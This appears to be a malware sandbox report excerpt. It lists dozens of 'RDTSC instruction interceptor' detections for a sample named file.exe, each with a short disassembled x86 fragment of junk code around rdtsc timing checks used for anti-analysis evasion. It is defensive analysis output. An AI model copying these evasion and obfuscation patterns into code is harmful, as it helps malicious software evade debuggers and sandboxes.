Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B648 second address: A0B688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA54h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7F147AEA51h 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 jng 00007F7F147AEA4Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007F7F147AEA46h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B821 second address: A0B845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c jmp 00007F7F1511CE38h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0BB56 second address: A0BBB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F147AEA4Eh 0x00000008 jns 00007F7F147AEA46h 0x0000000e jmp 00007F7F147AEA4Eh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 ja 00007F7F147AEA7Dh 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f jne 00007F7F147AEA46h 0x00000025 pop edi 0x00000026 pushad 0x00000027 jmp 00007F7F147AEA55h 0x0000002c jmp 00007F7F147AEA4Eh 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C0FF second address: A0C103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C5F6 second address: A0C648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F147AEA46h 0x0000000a jl 00007F7F147AEA46h 0x00000010 popad 0x00000011 jmp 00007F7F147AEA58h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7F147AEA58h 0x0000001e jo 00007F7F147AEA4Eh 0x00000024 jno 00007F7F147AEA46h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C648 second address: A0C65F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1511CE31h 0x00000008 jmp 00007F7F1511CE2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6696 second address: 9D669A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D669A second address: 9D66A4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6728 second address: 9D6735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7F147AEA4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6735 second address: 9D6750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jg 00007F7F1511CE26h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6750 second address: 9D6757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6757 second address: 9D6765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE2Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6765 second address: 9D67C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ebx 0x00000017 jmp 00007F7F147AEA57h 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e mov cx, di 0x00000021 call 00007F7F147AEA49h 0x00000026 push ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d pop ebx 0x0000002e push eax 0x0000002f jmp 00007F7F147AEA4Fh 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D67C2 second address: 9D67C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6908 second address: 9D690E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D690E second address: 9D6922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6922 second address: 9D6926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6A6F second address: 9D6A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6CA2 second address: 9D6CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D718F second address: 9D7199 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7398 second address: 9D73DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and ecx, 17A4E6AFh 0x00000012 lea eax, dword ptr [ebp+12487E1Dh] 0x00000018 nop 0x00000019 pushad 0x0000001a push esi 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7F147AEA57h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D73DD second address: 9D740C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d jnc 00007F7F1511CE28h 0x00000013 pop esi 0x00000014 nop 0x00000015 mov edx, dword ptr [ebp+122D1A1Dh] 0x0000001b lea eax, dword ptr [ebp+12487DD9h] 0x00000021 add dword ptr [ebp+124770CDh], ebx 0x00000027 nop 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D740C second address: 9B7CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F7F147AEA59h 0x00000012 push ebx 0x00000013 jmp 00007F7F147AEA59h 0x00000018 pop ebx 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F7F147AEA48h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 call dword ptr [ebp+122D2B4Eh] 0x0000003b jng 00007F7F147AEA7Fh 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 jmp 00007F7F147AEA58h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B7CC5 second address: 9B7CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10CCF second address: A10CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA52h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10CF1 second address: A10CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10CF7 second address: A10D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 je 00007F7F147AEA48h 0x0000000d pushad 0x0000000e jmp 00007F7F147AEA56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10D1F second address: A10D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10D25 second address: A10D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F7F147AEA4Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13E96 second address: A13EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F7F1511CE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A16227 second address: A1623D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F7F147AEA4Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15DB4 second address: A15DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15DBF second address: A15DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18A42 second address: A18A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18A48 second address: A18A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F147AEA4Fh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18C5B second address: A18C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18F04 second address: A18F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA59h 0x00000009 popad 0x0000000a jns 00007F7F147AEA48h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18F2D second address: A18F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7F1511CE26h 0x0000000a jmp 00007F7F1511CE34h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F7F1511CE26h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1D5CA second address: A1D601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Dh 0x00000007 jnp 00007F7F147AEA52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F147AEA52h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1D601 second address: A1D60D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1D60D second address: A1D611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DA38 second address: A1DA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBAA second address: A1DBE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA54h 0x00000007 jmp 00007F7F147AEA4Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F147AEA55h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBE8 second address: A1DBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F1511CE26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A230AD second address: A230EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F147AEA51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F147AEA56h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F7F147AEA50h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23258 second address: A2327D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE37h 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F7F1511CE26h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2327D second address: A232B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F7F147AEA57h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A232B6 second address: A232BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A232BE second address: A232C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A232C7 second address: A232CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A236FB second address: A23704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23704 second address: A23708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6F2B second address: 9D6F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24653 second address: A24657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2784A second address: A2784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F764 second address: 98F78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F1511CE26h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7F1511CE39h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A27269 second address: A27273 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A27273 second address: A27288 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7F1511CE28h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2E9BD second address: A2E9C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2CAA8 second address: A2CAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F1511CE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2CAB2 second address: A2CAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2CAB8 second address: A2CAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2CC4A second address: A2CC4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D360 second address: A2D364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D364 second address: A2D39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7F147AEA4Ch 0x0000000e jno 00007F7F147AEA46h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 jmp 00007F7F147AEA4Ah 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7F147AEA4Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D5F0 second address: A2D5F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D5F6 second address: A2D600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D856 second address: A2D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2E11A second address: A2E120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2E120 second address: A2E134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3286E second address: A32874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32874 second address: A3287A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3287A second address: A3288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F7F147AEA46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3288B second address: A32891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32891 second address: A328A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F7F147AEA4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32BF0 second address: A32BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32FF8 second address: A32FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33177 second address: A3317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3317D second address: A33183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33183 second address: A33188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A332E8 second address: A332EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A37D37 second address: A37D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F7F1511CE2Ah 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F7F1511CE2Fh 0x00000013 jc 00007F7F1511CE26h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E501 second address: A3E51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA58h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E946 second address: A3E94B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A441AE second address: A441D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7F147AEA5Dh 0x0000000b jmp 00007F7F147AEA57h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F7F147AEA46h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45A4A second address: A45A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45A4E second address: A45A7A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F147AEA58h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45A7A second address: A45A9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jmp 00007F7F1511CE2Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F7F1511CE26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45A9D second address: A45AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45AAC second address: A45AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
